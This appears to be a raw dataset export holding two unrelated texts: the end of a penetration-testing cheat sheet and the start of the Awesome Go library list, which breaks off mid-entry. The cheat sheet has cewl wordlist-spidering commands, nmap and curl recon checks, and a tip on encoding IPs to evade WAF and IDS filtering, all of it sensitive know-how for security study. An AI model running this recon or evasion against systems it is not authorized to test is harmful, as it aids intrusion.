surface\" - from the author (see link). Visual dirbuster?\n\n### Crawl web pages for keywords - useful for password/vhost enumeration lists\n\n```bash\n# To spider a site and write all found words to a file\ncewl -w \n\n# To spider a site and follow links to other sites\ncewl -o \n\n# To spider a site using a given user-agent \ncewl -u \n\n# To spider a site for a given depth and minimum word length\ncewl -d -m \n\n# To spider a site and include a count for each word\ncewl -c \n\n# To spider a site inluding meta data and separate the meta_data words\ncewl -a -meta_file \n\n# To spider a site and store email adresses in a separate file\ncewl -e -email_file \n```\n\n### Common checks\n\n```bash\n# robots.txt\ncurl http://example.com/robots.txt\n\n# headers\nwget --save-headers http://www.example.com/\n # Strict-Transport-Security (HSTS)\n # X-Frame-Options: SAMEORIGIN\n # X-XSS-Protection: 1; mode=block\n # X-Content-Type-Options: nosniff\n\n# Cookies\n # Check Secure and HttpOnly flag in session cookie\n # If you find a BIG-IP cookie, app is behind a load balancer\n\n# SSL Ciphers\nnmap --script ssl-enum-ciphers -p 443 www.example.com\n\n# HTTP Methods\nnmap -p 443 --script http-methods www.example.com\n\n# Cross Domain Policy\ncurl http://example.com/crossdomain.xml\n # allow-access-from domain=\"*\"\n```\n\n### IP conversion\n\nInjecting IPs when '**`.`**' is disallowed: convert the standard \"dotted decimal\" format to decimal, or hex value using -[ip2dh](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py). The sending or receiving computer will usually automatically convert it to a format that it can use. This is a great way to bypass WAF, IDS, or other tools that filter on IPs.\n\n\n\nIf you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!\n"}}},{"rowIdx":322,"cells":{"text":{"kind":"string","value":"# Awesome Go\n\n\"awesome-go\"\n\n[![Build Status](https://github.com/avelino/awesome-go/actions/workflows/tests.yaml/badge.svg?branch=main)](https://github.com/avelino/awesome-go/actions/workflows/tests.yaml?query=branch%3Amain)\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n[![Slack Widget](https://img.shields.io/badge/join-us%20on%20slack-gray.svg?longCache=true&logo=slack&colorB=red)](https://gophers.slack.com/messages/awesome)\n[![Netlify Status](https://api.netlify.com/api/v1/badges/83a6dcbe-0da6-433e-b586-f68109286bd5/deploy-status)](https://app.netlify.com/sites/awesome-go/deploys)\n[![Track Awesome List](https://www.trackawesomelist.com/badge.svg)](https://www.trackawesomelist.com/avelino/awesome-go/)\n\nWe use the _[Golang Bridge](https://github.com/gobridge/about-us/blob/master/README.md)_ community Slack for instant communication, follow the [form here to join](https://invite.slack.golangbridge.org/).\n\n\"awesome-go\n\n**Sponsorships:**\n\n_Special thanks to_\n\n\n\n**Awesome Go has no monthly fee**_, but we have employees who **work hard** to keep it running. With money raised, we can repay the effort of each person involved! You can see how we calculate our billing and distribution as it is open to the entire community. Want to be a supporter of the project click [here](mailto:avelinorun+oss@gmail.com?subject=awesome-go%3A%20project%20support)._\n\n> A curated list of awesome Go frameworks, libraries, and software. Inspired by [awesome-python](https://github.com/vinta/awesome-python).\n\n**Contributing:**\n\nPlease take a quick gander at the [contribution guidelines](https://github.com/avelino/awesome-go/blob/main/CONTRIBUTING.md) first. Thanks to all [contributors](https://github.com/avelino/awesome-go/graphs/contributors); you rock!\n\n> _If you see a package or project here that is no longer maintained or is not a good fit, please submit a pull request to improve this file. Thank you!_\n\n## Contents\n\n- [Awesome Go](#awesome-go)\n - [Contents](#contents)\n - [Audio and Music](#audio-and-music)\n - [Authentication and OAuth](#authentication-and-oauth)\n - [Blockchain](#blockchain)\n - [Bot Building](#bot-building)\n - [Build Automation](#build-automation)\n - [Command Line](#command-line)\n - [Advanced Console UIs](#advanced-console-uis)\n - [Standard CLI](#standard-cli)\n - [Configuration](#configuration)\n - [Continuous Integration](#continuous-integration)\n - [CSS Preprocessors](#css-preprocessors)\n - [Data Structures and Algorithms](#data-structures-and-algorithms)\n - [Bit-packing and Compression](#bit-packing-and-compression)\n - [Bit Sets](#bit-sets)\n - [Bloom and Cuckoo Filters](#bloom-and-cuckoo-filters)\n - [Data Structure and Algorithm Collections](#data-structure-and-algorithm-collections)\n - [Iterators](#iterators)\n - [Maps](#maps)\n - [Miscellaneous Data Structures and Algorithms](#miscellaneous-data-structures-and-algorithms)\n - [Nullable Types](#nullable-types)\n - [Queues](#queues)\n - [Sets](#sets)\n - [Text Analysis](#text-analysis)\n - [Trees](#trees)\n - [Pipes](#pipes)\n - [Database](#database)\n - [Caches](#caches)\n - [Databases Implemented in Go](#databases-implemented-in-go)\n - [Database Schema Migration](#database-schema-migration)\n - [Database Tools](#database-tools)\n - [SQL Query Builders](#sql-query-builders)\n - [Database Drivers](#database-drivers)\n - [Interfaces to Multiple Backends](#interfaces-to-multiple-backends)\n - [Relational Database Drivers](#relational-database-drivers)\n - [NoSQL Database Drivers](#nosql-database-drivers)\n - [Search and Analytic Databases](#search-and-analytic-databases)\n - [Date and Time](#date-and-time)\n - [Distributed Systems](#distributed-systems)\n - [Dynamic DNS](#dynamic-dns)\n - [Email](#email)\n - [Embeddable Scripting Languages](#embeddable-scripting-languages)\n - [Error Handling](#error-handling)\n - [File Handling](#file-handling)\n - [Financial](#financial)\n - [Forms](#forms)\n - [Functional](#functional)\n - [Game Development](#game-development)\n - [Generators](#generators)\n - [Geographic](#geographic)\n - [Go Compilers](#go-compilers)\n - [Goroutines](#goroutines)\n - [GUI](#gui)\n - [Hardware](#hardware)\n - [Images](#images)\n - [IoT (Internet of Things)](#iot-internet-of-things)\n - [Job Scheduler](#job-scheduler)\n - [JSON](#json)\n - [Logging](#logging)\n - [Machine Learning](#machine-learning)\n - [Messaging](#messaging)\n - [Microsoft Office](#microsoft-office)\n - [Microsoft Excel](#microsoft-excel)\n - [Miscellaneous](#miscellaneous)\n - [Dependency Injection](#dependency-injection)\n - [Project Layout](#project-layout)\n - [Strings](#strings)\n - [Uncategorized](#uncategorized)\n - [Natural Language Processing](#natural-language-processing)\n - [Language Detection](#language-detection)\n - [Morphological Analyzers](#morphological-analyzers)\n - [Slugifiers](#slugifiers)\n - [Tokenizers](#tokenizers)\n - [Translation](#translation)\n - [Transliteration](#transliteration)\n - [Networking](#networking)\n - [HTTP Clients](#http-clients)\n - [OpenGL](#opengl)\n - [ORM](#orm)\n - [Package Management](#package-management)\n - [Performance](#performance)\n - [Query Language](#query-language)\n - [Resource Embedding](#resource-embedding)\n - [Science and Data Analysis](#science-and-data-analysis)\n - [Security](#security)\n - [Serialization](#serialization)\n - [Server Applications](#server-applications)\n - [Stream Processing](#stream-processing)\n - [Template Engines](#template-engines)\n - [Testing](#testing)\n - [Text Processing](#text-processing)\n - [Formatters](#formatters)\n - [Markup Languages](#markup-languages)\n - [Parsers/Encoders/Decoders](#parsersencodersdecoders)\n - [Regular Expressions](#regular-expressions)\n - [Sanitation](#sanitation)\n - [Scrapers](#scrapers)\n - [RSS](#rss)\n - [Utility/Miscellaneous](#utilitymiscellaneous)\n - [Third-party APIs](#third-party-apis)\n - [Utilities](#utilities)\n - [UUID](#uuid)\n - [Validation](#validation)\n - [Version Control](#version-control)\n - [Video](#video)\n - [Web Frameworks](#web-frameworks)\n - [Middlewares](#middlewares)\n - [Actual middlewares](#actual-middlewares)\n - [Libraries for creating HTTP middlewares](#libraries-for-creating-http-middlewares)\n - [Routers](#routers)\n - [WebAssembly](#webassembly)\n - [Windows](#windows)\n - [XML](#xml)\n - [Zero Trust](#zero-trust)\n - [Code Analysis](#code-analysis)\n - [Editor Plugins](#editor-plugins)\n - [Go Generate Tools](#go-generate-tools)\n - [Go Tools](#go-tools)\n - [Software Packages](#software-packages)\n - [DevOps Tools](#devops-tools)\n - [Other Software](#other-software)\n- [Resources](#resources)\n - [Benchmarks](#benchmarks)\n - [Conferences](#conferences)\n - [E-Books](#e-books)\n - [E-books for purchase](#e-books-for-purchase)\n - [Free e-books](#free-e-books)\n - [Gophers](#gophers)\n - [Meetups](#meetups)\n - [Style Guides](#style-guides)\n - [Social Media](#social-media)\n - [Twitter](#twitter)\n - [Reddit](#reddit)\n - [Websites](#websites)\n - [Tutorials](#tutorials)\n - [Guided Learning Paths](#guided-learning)\n\n**[⬆ back to top](#contents)**\n\n## Audio and Music\n\n_Libraries for manipulating audio._\n\n- [flac](https://github.com/mewkiz/flac) - Native Go FLAC encoder/decoder with support for FLAC streams.\n- [gaad](https://github.com/Comcast/gaad) - Native Go AAC bitstream parser.\n- [GoAudio](https://github.com/DylanMeeus/GoAudio) - Native Go Audio Processing Library.\n- [gosamplerate](https://github.com/dh1tw/gosamplerate) - libsamplerate bindings for go.\n- [id3v2](https://github.com/bogem/id3v2) - ID3 decoding and encoding library for Go.\n- [malgo](https://github.com/gen2brain/malgo) - Mini audio library.\n- [minimp3](https://github.com/tosone/minimp3) - Lightweight MP3 decoder library.\n- [Oto](https://github.com/hajimehoshi/oto) - A low-level library to play sound on multiple platforms.\n- [PortAudio](https://github.com/gordonklaus/portaudio) - Go bindings for the PortAudio audio I/O library.\n\n**[⬆ back to top](#contents)**\n\n## Authentication and OAuth\n\n_Libraries for implementing authentication schemes._\n\n- [authboss](https://github.com/volatiletech/authboss) - Modular authentication system for the web. It tries to remove as much boilerplate and \"hard things\" as possible so that each time you start a new web project in Go, you can plug it in, configure it, and start building your app without having to build an authentication system each time.\n- [branca](https://github.com/essentialkaos/branca) - branca token [specification implementation](https://github.com/tuupola/branca-spec) for Golang 1.15+.\n- [casbin](https://github.com/hsluoyz/casbin) - Authorization library that supports access control models like ACL, RBAC, and ABAC.\n- [cookiestxt](https://github.com/mengzhuo/cookiestxt) - provides a parser of cookies.txt file format.\n- [go-guardian](https://github.com/shaj13/go-guardian) - Go-Guardian is a golang library that provides a simple, clean, and idiomatic way to create powerful modern API and web authentication that supports LDAP, Basic, Bearer token, and Certificate based authentication.\n- [go-jose](https://github.com/go-jose/go-jose) - Fairly complete implementation of the JOSE working group's JSON Web Token, JSON Web Signatures, and JSON Web Encryption specs.\n- [gologin](https://github.com/dghubble/gologin) - chainable handlers for login with OAuth1 and OAuth2 authentication providers.\n- [gorbac](https://github.com/mikespook/gorbac) - provides a lightweight role-based access control (RBAC) implementation in Golang.\n- [gosession](http://github.com/Kwynto/gosession) - This is quick session for net/http in GoLang. This package is perhaps the best implementation of the session mechanism, or at least it tries to become one.\n- [goth](https://github.com/markbates/goth) - provides a simple, clean, and idiomatic way to use OAuth and OAuth2. Handles multiple providers out of the box.\n- [jeff](https://github.com/abraithwaite/jeff) - Simple, flexible, secure, and idiomatic web session management with pluggable backends.\n- [jwt](https://github.com/pascaldekloe/jwt) - Lightweight JSON Web Token (JWT) library.\n- [jwt](https://github.com/cristalhq/jwt) - Safe, simple, and fast JSON Web Tokens for Go.\n- [jwt-auth](https://github.com/adam-hanna/jwt-auth) - JWT middleware for Golang http servers with many configuration options.\n- [jwt-go](https://github.com/golang-jwt/jwt) - A full featured implementation of JSON Web Tokens (JWT). This library supports the parsing and verification as well as the generation and signing of JWTs.\n- [keto](https://github.com/ory/keto) - Open Source (Go) implementation of \"Zanzibar: Google's Consistent, Global Authorization System\". Ships gRPC, REST APIs, newSQL, and an easy and granular permission language. Supports ACL, RBAC, and other access models.\n- [loginsrv](https://github.com/tarent/loginsrv) - JWT login microservice with plugable backends such as OAuth2 (Github), htpasswd, osiam.\n- [oauth2](https://github.com/golang/oauth2) - Successor of goauth2. Generic OAuth 2.0 package that comes with JWT, Google APIs, Compute Engine, and App Engine support.\n- [osin](https://github.com/openshift/osin) - Golang OAuth2 server library.\n- [otpgen](https://github.com/grijul/otpgen) - Library to generate TOTP/HOTP codes.\n- [otpgo](https://github.com/jltorresm/otpgo) - Time-Based One-Time Password (TOTP) and HMAC-Based One-Time Password (HOTP) library for Go.\n- [paseto](https://github.com/o1egl/paseto) - Golang implementation of Platform-Agnostic Security Tokens (PASETO).\n- [permissions2](https://github.com/xyproto/permissions2) - Library for keeping track of users, login states, and permissions. Uses secure cookies and bcrypt.\n- [scope](https://github.com/SonicRoshan/scope) - Easily Manage OAuth2 Scopes In Go.\n- [scs](https://github.com/alexedwards/scs) - Session Manager for HTTP servers.\n- [securecookie](https://github.com/chmike/securecookie) - Efficient secure cookie encoding/decoding.\n- [session](https://github.com/icza/session) - Go session management for web servers (including support for Google App Engine - GAE).\n- [sessions](https://github.com/adam-hanna/sessions) - Dead simple, highly performant, highly customizable sessions service for go http servers.\n- [sessionup](https://github.com/swithek/sessionup) - Simple, yet effective HTTP session management and identification package.\n- [sjwt](https://github.com/brianvoe/sjwt) - Simple jwt generator and parser.\n\n**[⬆ back to top](#contents)**\n\n## Blockchain\n\n_Tools for building blockchains._\n\n- [cometbft](https://github.com/cometbft/cometbft) - A distributed, Byzantine fault-tolerant, deterministic state machine replication engine. It is a fork of Tendermint Core and implements the Tendermint consensus algorithm.\n- [cosmos-sdk](https://github.com/cosmos/cosmos-sdk) - A Framework for Building Public Blockchains in the Cosmos Ecosystem.\n- [go-ethereum](https://github.com/ethereum/go-ethereum) - Official Go implementation of the Ethereum protocol.\n- [gossamer](https://github.com/ChainSafe/gossamer) - A Go implementation of the Polkadot Host.\n- [solana-go](https://github.com/gagliardetto/solana-go) - Go library to interface with Solana JSON RPC and WebSocket interfaces.\n- [tendermint](https://github.com/tendermint/tendermint) - High-performance middleware for transforming a state machine written in any programming language into a Byzantine Fault Tolerant replicated state machine using the Tendermint consensus and blockchain protocols.\n\n**[⬆ back to top](#contents)**\n\n## Bot Building\n\n_Libraries for building and working with bots._\n\n- [bot](https://github.com/go-telegram/bot) - Zero-dependencies Telegram Bot library with additional UI components\n- [echotron](https://github.com/NicoNex/echotron) - An elegant and concurrent library for Telegram Bots in Go.\n- [ephemeral-roles](https://github.com/ewohltman/ephemeral-roles) - A Discord bot for managing ephemeral roles based upon voice channel member presence.\n- [go-chat-bot](https://github.com/go-chat-bot/bot) - IRC, Slack & Telegram bot written in Go.\n- [go-joe](https://joe-bot.net) - A general-purpose bot library inspired by Hubot but written in Go.\n- [go-sarah](https://github.com/oklahomer/go-sarah) - Framework to build a bot for desired chat services including LINE, Slack, Gitter, and more.\n- [go-tgbot](https://github.com/olebedev/go-tgbot) - Pure Golang Telegram Bot API wrapper, generated from swagger file, session-based router, and middleware.\n- [go-twitch-irc](https://github.com/gempir/go-twitch-irc) - Library to write bots for twitch.tv chat\n- [Golang CryptoTrading Bot](https://github.com/saniales/golang-crypto-trading-bot) - A golang implementation of a console-based trading bot for cryptocurrency exchanges.\n- [govkbot](https://github.com/nikepan/govkbot) - Simple Go [VK](https://vk.com) bot library.\n- [hanu](https://github.com/sbstjn/hanu) - Framework for writing Slack bots.\n- [Kelp](https://github.com/stellar/kelp) - official trading and market-making bot for the [Stellar](https://www.stellar.org/) DEX. Works out-of-the-box, written in Golang, compatible with centralized exchanges and custom trading strategies.\n- [larry](https://github.com/ezeoleaf/larry) - Larry 🐦 is a really simple Twitter bot generator that tweets random repositories from Github built in Go.\n- [margelet](https://github.com/zhulik/margelet) - Framework for building Telegram bots.\n- [micha](https://github.com/onrik/micha) - Go Library for Telegram bot api.\n- [olivia](https://github.com/olivia-ai/olivia) - A chatbot built with an artificial neural network.\n- [slack-bot](https://github.com/innogames/slack-bot) - Ready to use Slack Bot for lazy developers: Custom commands, Jenkins, Jira, Bitbucket, Github...\n- [slacker](https://github.com/shomali11/slacker) - Easy to use framework to create Slack bots.\n- [slackscot](https://github.com/alexandre-normand/slackscot) - Another framework for building Slack bots.\n- [tbot](https://github.com/yanzay/tbot) - Telegram bot server with API similar to net/http.\n- [telebot](https://github.com/tucnak/telebot) - Telegram bot framework is written in Go.\n- [telego](https://github.com/mymmrac/telego) - Telegram Bot API library for Golang with full one-to-one API implementation.\n- [telegram-bot-api](https://github.com/Syfaro/telegram-bot-api) - Simple and clean Telegram bot client.\n- [teleterm](https://github.com/alfiankan/teleterm) - Telegram Bot Exec Terminal Command.\n- [Tenyks](https://github.com/kyleterry/tenyks) - Service oriented IRC bot using Redis and JSON for messaging.\n- [wayback](https://github.com/wabarc/wayback) - A bot for Telegram, Mastodon, Slack, and other messaging platforms archives webpages.\n\n**[⬆ back to top](#contents)**\n\n## Build Automation\n\n_Libraries and tools help with build automation._\n\n- [1build](https://github.com/gopinath-langote/1build) - Command line tool to frictionlessly manage project-specific commands.\n- [anko](https://github.com/GuilhermeCaruso/anko) - Simple application watcher for multiple programming languages.\n- [gaper](https://github.com/maxcnunes/gaper) - Builds and restarts a Go project when it crashes or some watched file changes.\n- [gilbert](https://go-gilbert.github.io) - Build system and task runner for Go projects.\n- [goyek](https://github.com/goyek/goyek) - Create build pipelines in Go.\n- [mage](https://github.com/magefile/mage) - Mage is a make/rake-like build tool using Go.\n- [mmake](https://github.com/tj/mmake) - Modern Make.\n- [realize](https://github.com/tockins/realize) - Go build a system with file watchers and live to reload. Run, build and watch file changes with custom paths.\n- [Task](https://github.com/go-task/task) - simple \"Make\" alternative.\n- [taskctl](https://github.com/taskctl/taskctl) - Concurrent task runner.\n- [xc](https://github.com/joerdav/xc) - Task runner with README.md defined tasks, executable markdown.\n\n**[⬆ back to top](#contents)**\n\n## Command Line\n\n### Advanced Console UIs\n\n_Libraries for building Console Applications and Console User Interfaces._\n\n- [asciigraph](https://github.com/guptarohit/asciigraph) - Go package to make lightweight ASCII line graph ╭┈╯ in command line apps with no other dependencies.\n- [aurora](https://github.com/logrusorgru/aurora) - ANSI terminal colors that support fmt.Printf/Sprintf.\n- [box-cli-maker](https://github.com/Delta456/box-cli-maker) - Make Highly Customized Boxes for your CLI.\n- [bubble-table](https://github.com/Evertras/bubble-table) - An interactive table component for bubbletea.\n- [bubbles](https://github.com/charmbracelet/bubbles) - TUI components for bubbletea.\n- [bubbletea](https://github.com/charmbracelet/bubbletea) - Go framework to build terminal apps, based on The Elm Architecture.\n- [cfmt](https://github.com/mingrammer/cfmt) - Contextual fmt inspired by bootstrap color classes.\n- [cfmt](https://github.com/i582/cfmt) - Simple and convenient formatted stylized output fully compatible with fmt library.\n- [chalk](https://github.com/ttacon/chalk) - Intuitive package for prettifying terminal/console output.\n- [colourize](https://github.com/TreyBastian/colourize) - Go library for ANSI colour text in terminals.\n- [crab-config-files-templating](https://github.com/alfiankan/crab-config-files-templating) - Dynamic configuration file templating tool for kubernetes manifest or general configuration files.\n- [ctc](https://github.com/wzshiming/ctc) - The non-invasive cross-platform terminal color library does not need to modify the Print method.\n- [go-ataman](https://github.com/workanator/go-ataman) - Go library for rendering ANSI colored text templates in terminals.\n- [go-colorable](https://github.com/mattn/go-colorable) - Colorable writer for windows.\n- [go-colortext](https://github.com/daviddengcn/go-colortext) - Go library for color output in terminals.\n- [go-isatty](https://github.com/mattn/go-isatty) - isatty for golang.\n- [go-palette](https://github.com/abusomani/go-palette) - Go library that provides elegant and convenient style definitions using ANSI colors. Fully compatible & wraps the [fmt library](https://pkg.go.dev/fmt) for nice terminal layouts.\n- [go-prompt](https://github.com/c-bata/go-prompt) - Library for building a powerful interactive prompt, inspired by [python-prompt-toolkit](https://github.com/jonathanslenders/python-prompt-toolkit).\n- [gocui](https://github.com/jroimartin/gocui) - Minimalist Go library aimed at creating Console User Interfaces.\n- [gommon/color](https://github.com/labstack/gommon/tree/master/color) - Style terminal text.\n- [gookit/color](https://github.com/gookit/color) - Terminal color rendering tool library, support 16 colors, 256 colors, RGB color rendering output, compatible with Windows.\n- [lipgloss](https://github.com/charmbracelet/lipgloss) - Declaratively define styles for color, format and layout in the terminal.\n- [marker](https://github.com/cyucelen/marker) - Easiest way to match and mark strings for colorful terminal outputs.\n- [mpb](https://github.com/vbauerster/mpb) - Multi progress bar for terminal applications.\n- [progressbar](https://github.com/schollz/progressbar) - Basic thread-safe progress bar that works in every OS.\n- [pterm](https://github.com/pterm/pterm) - A library to beautify console output on every platform with many combinable components.\n- [simpletable](https://github.com/alexeyco/simpletable) - Simple tables in a terminal with Go.\n- [spinner](https://github.com/briandowns/spinner) - Go package to easily provide a terminal spinner with options.\n- [tabby](https://github.com/cheynewallace/tabby) - A tiny library for super simple Golang tables.\n- [table](https://github.com/tomlazar/table) - Small library for terminal color based tables .\n- [tabular](https://github.com/InVisionApp/tabular) - Print ASCII tables from command line utilities without the need to pass large sets of data to the API.\n- [termbox-go](https://github.com/nsf/termbox-go) - Termbox is a library for creating cross-platform text-based interfaces.\n- [termdash](https://github.com/mum4k/termdash) - Go terminal dashboard based on **termbox-go** and inspired by [termui](https://github.com/gizak/termui).\n- [termenv](https://github.com/muesli/termenv) - Advanced ANSI style & color support for your terminal applications.\n- [termui](https://github.com/gizak/termui) - Go terminal dashboard based on **termbox-go** and inspired by [blessed-contrib](https://github.com/yaronn/blessed-contrib).\n- [uilive](https://github.com/gosuri/uilive) - Library for updating terminal output in real time.\n- [uiprogress](https://github.com/gosuri/uiprogress) - Flexible library to render progress bars in terminal applications.\n- [uitable](https://github.com/gosuri/uitable) - Library to improve readability in terminal apps using tabular data.\n- [yacspin](https://github.com/theckman/yacspin) - Yet Another CLi Spinner package, for working with terminal spinners.\n\n**[⬆ back to top](#contents)**\n\n### Standard CLI\n\n_Libraries for building standard or basic Command Line applications._\n\n- [acmd](https://github.com/cristalhq/acmd) - Simple, useful, and opinionated CLI package in Go.\n- [argparse](https://github.com/akamensky/argparse) - Command line argument parser inspired by Python's argparse module.\n- [argv](https://github.com/cosiner/argv) - Go library to split command line string as arguments array using the bash syntax.\n- [carapace](https://github.com/rsteube/carapace) - Command argument completion generator for spf13/cobra.\n- [carapace-bin](https://github.com/rsteube/carapace-bin) - Multi-shell multi-command argument completer.\n- [carapace-spec](https://github.com/rsteube/carapace-spec) - Define simple completions using a spec file.\n- [cli](https://github.com/mkideal/cli) - Feature-rich and easy to use command-line package based on golang struct tags.\n- [cli](https://github.com/teris-io/cli) - Simple and complete API for building command line interfaces in Go.\n- [climax](https://github.com/tucnak/climax) - Alternative CLI with \"human face\", in spirit of Go command.\n- [clîr](https://github.com/leaanthony/clir) - A Simple and Clear CLI library. Dependency free.\n- [cmd](https://github.com/posener/cmd) - Extends the standard `flag` package to support sub commands and more in idiomatic way.\n- [cmdr](https://github.com/hedzr/cmdr) - A POSIX/GNU style, getopt-like command-line UI Go library.\n- [cobra](https://github.com/spf13/cobra) - Commander for modern Go CLI interactions.\n- [command-chain](https://github.com/rainu/go-command-chain) - A go library for configure and run command chains - such as pipelining in unix shells.\n- [commandeer](https://github.com/jaffee/commandeer) - Dev-friendly CLI apps: sets up flags, defaults, and usage based on struct fields and tags.\n- [complete](https://github.com/posener/complete) - Write bash completions in Go + Go command bash completion.\n- [Dnote](https://github.com/dnote/dnote) - A simple command line notebook with multi-device sync.\n- [elvish](https://github.com/elves/elvish) - An expressive programming language and a versatile interactive shell.\n- [env](https://github.com/codingconcepts/env) - Tag-based environment configuration for structs.\n- [flag](https://github.com/cosiner/flag) - Simple but powerful command line option parsing library for Go supporting subcommand.\n- [flaggy](https://github.com/integrii/flaggy) - A robust and idiomatic flags package with excellent subcommand support.\n- [flagvar](https://github.com/sgreben/flagvar) - A collection of flag argument types for Go's standard `flag` package.\n- [go-andotp](https://github.com/grijul/go-andotp) - A CLI program to encrypt/decrypt [andOTP](https://github.com/andOTP/andOTP) files. Can be used as a library as well.\n- [go-arg](https://github.com/alexflint/go-arg) - Struct-based argument parsing in Go.\n- [go-commander](https://github.com/yitsushi/go-commander) - Go library to simplify CLI workflow.\n- [go-flags](https://github.com/jessevdk/go-flags) - go command line option parser.\n- [go-getoptions](https://github.com/DavidGamba/go-getoptions) - Go option parser inspired by the flexibility of Perl’s GetOpt::Long.\n- [gocmd](https://github.com/devfacet/gocmd) - Go library for building command line applications.\n- [hiboot cli](https://github.com/hidevopsio/hiboot/tree/master/pkg/app/cli) - cli application framework with auto configuration and dependency injection.\n- [job](https://github.com/liujianping/job) - JOB, make your short-term command as a long-term job.\n- [kingpin](https://github.com/alecthomas/kingpin) - Command line and flag parser supporting sub commands (superseded by `kong`; see below).\n- [liner](https://github.com/peterh/liner) - Go readline-like library for command-line interfaces.\n- [mcli](https://github.com/jxskiss/mcli) - A minimal but very powerful cli library for Go.\n- [mitchellh/cli](https://github.com/mitchellh/cli) - Go library for implementing command-line interfaces.\n- [mow.cli](https://github.com/jawher/mow.cli) - Go library for building CLI applications with sophisticated flag and argument parsing and validation.\n- [ops](https://github.com/nanovms/ops) - Unikernel Builder/Orchestrator.\n- [pflag](https://github.com/spf13/pflag) - Drop-in replacement for Go's flag package, implementing POSIX/GNU-style --flags.\n- [readline](https://github.com/reeflective/readline) Shell library with modern and easy to use UI features.\n- [sand](https://github.com/Zaba505/sand) - Simple API for creating interpreters and so much more.\n- [sflags](https://github.com/octago/sflags) - Struct based flags generator for flag, urfave/cli, pflag, cobra, kingpin, and other libraries.\n- [strumt](https://github.com/antham/strumt) - Library to create prompt chain.\n- [subcmd](https://github.com/bobg/subcmd) - Another approach to parsing and running subcommands. Works alongside the standard `flag` package.\n- [survey](https://github.com/go-survey/survey) - Build interactive and accessible prompts with full support for windows and posix terminals.\n- [ts](https://github.com/liujianping/ts) - Timestamp convert & compare tool.\n- [ukautz/clif](https://github.com/ukautz/clif) - Small command line interface framework.\n- [urfave/cli](https://github.com/urfave/cli) - Simple, fast, and fun package for building command line apps in Go (formerly codegangsta/cli).\n- [version](https://github.com/mszostok/version) - Collects and displays CLI version information in multiple formats along with upgrade notice.\n- [wlog](https://github.com/dixonwille/wlog) - Simple logging interface that supports cross-platform color and concurrency.\n- [wmenu](https://github.com/dixonwille/wmenu) - Easy to use menu structure for cli applications that prompt users to make choices.\n\n**[⬆ back to top](#contents)**\n\n## Configuration\n\n_Libraries for configuration parsing._\n\n- [aconfig](https://github.com/cristalhq/aconfig) - Simple, useful and opinionated config loader.\n- [cleanenv](https://github.com/ilyakaznacheev/cleanenv) - Minimalistic configuration reader (from files, ENV, and wherever you want).\n- [config](https://github.com/JeremyLoy/config) - Cloud native application configuration. Bind ENV to structs in only two lines.\n- [config](https://github.com/num30/config) - configure you app using file, environment variables, or flags in two lines of code\n- [config](https://github.com/olebedev/config) - JSON or YAML configuration wrapper with environment variables and flags parsing.\n- [configuration](https://github.com/BoRuDar/configuration) - Library for initializing configuration structs from env variables, files, flags and 'default' tag.\n- [configure](https://github.com/paked/configure) - Provides configuration through multiple sources, including JSON, flags and environment variables.\n- [configuro](https://github.com/sherifabdlnaby/configuro) - opinionated configuration loading & validation framework from ENV and Files focused towards 12-Factor compliant applications.\n- [confita](https://github.com/heetch/confita) - Load configuration in cascade from multiple backends into a struct.\n- [conflate](https://github.com/the4thamigo-uk/conflate) - Library/tool to merge multiple JSON/YAML/TOML files from arbitrary URLs, validation against a JSON schema, and application of default values defined in the schema.\n- [env](https://github.com/caarlos0/env) - Parse environment variables to Go structs (with defaults).\n- [env](https://github.com/junk1tm/env) - A lightweight package for loading environment variables into structs.\n- [envcfg](https://github.com/tomazk/envcfg) - Un-marshaling environment variables to Go structs.\n- [envconf](https://github.com/ian-kent/envconf) - Configuration from environment.\n- [envconfig](https://github.com/vrischmann/envconfig) - Read your configuration from environment variables.\n- [envh](https://github.com/antham/envh) - Helpers to manage environment variables.\n- [fig](https://github.com/kkyr/fig) - Tiny library for reading configuration from a file and from environment variables (with validation & defaults).\n- [gcfg](https://github.com/go-gcfg/gcfg) - read INI-style configuration files into Go structs; supports user-defined types and subsections.\n- [genv](https://github.com/sakirsensoy/genv) - Read environment variables easily with dotenv support.\n- [go-aws-ssm](https://github.com/PaddleHQ/go-aws-ssm) - Go package that fetches parameters from AWS System Manager - Parameter Store.\n- [go-conf](https://github.com/ThomasObenaus/go-conf) - Simple library for application configuration based on annotated structs. It supports reading the configuration from environment variables, config files and command line parameters.\n- [go-ini](https://github.com/subpop/go-ini) - A Go package that marshals and unmarshals INI-files.\n- [go-ssm-config](https://github.com/ianlopshire/go-ssm-config) - Go utility for loading configuration parameters from AWS SSM (Parameter Store).\n- [go-up](https://github.com/ufoscout/go-up) - A simple configuration library with recursive placeholders resolution and no magic.\n- [goConfig](https://github.com/crgimenes/goConfig) - Parses a struct as input and populates the fields of this struct with parameters from command line, environment variables and configuration file.\n- [godotenv](https://github.com/joho/godotenv) - Go port of Ruby's dotenv library (Loads environment variables from `.env`).\n- [gofigure](https://github.com/ian-kent/gofigure) - Go application configuration made easy.\n- [GoLobby/Config](https://github.com/golobby/config) - GoLobby Config is a lightweight yet powerful configuration manager for the Go programming language.\n- [gone/jconf](https://github.com/One-com/gone/tree/master/jconf) - Modular JSON configuration. Keep you config structs along with the code they configure and delegate parsing to submodules without sacrificing full config serialization.\n- [gonfig](https://github.com/milad-abbasi/gonfig) - Tag-based configuration parser which loads values from different providers into typesafe struct.\n- [gookit/config](https://github.com/gookit/config) - application config manage(load,get,set). support JSON, YAML, TOML, INI, HCL. multi file load, data override merge.\n- [harvester](https://github.com/beatlabs/harvester) - Harvester, a easy to use static and dynamic configuration package supporting seeding, env vars and Consul integration.\n- [hjson](https://github.com/hjson/hjson-go) - Human JSON, a configuration file format for humans. Relaxed syntax, fewer mistakes, more comments.\n- [hocon](https://github.com/gurkankaymak/hocon) - Configuration library for working with the HOCON(a human-friendly JSON superset) format, supports features like environment variables, referencing other values, comments and multiple files.\n- [ingo](https://github.com/schachmat/ingo) - Flags persisted in an ini-like config file.\n- [ini](https://github.com/go-ini/ini) - Go package to read and write INI files.\n- [ini](https://github.com/wlevene/ini) - INI Parser & Write Library, Unmarshal to Struct,Marshal to Json,Write File,watch file.\n- [joshbetz/config](https://github.com/joshbetz/config) - Small configuration library for Go that parses environment variables, JSON files, and reloads automatically on SIGHUP.\n- [kelseyhightower/envconfig](https://github.com/kelseyhightower/envconfig) - Go 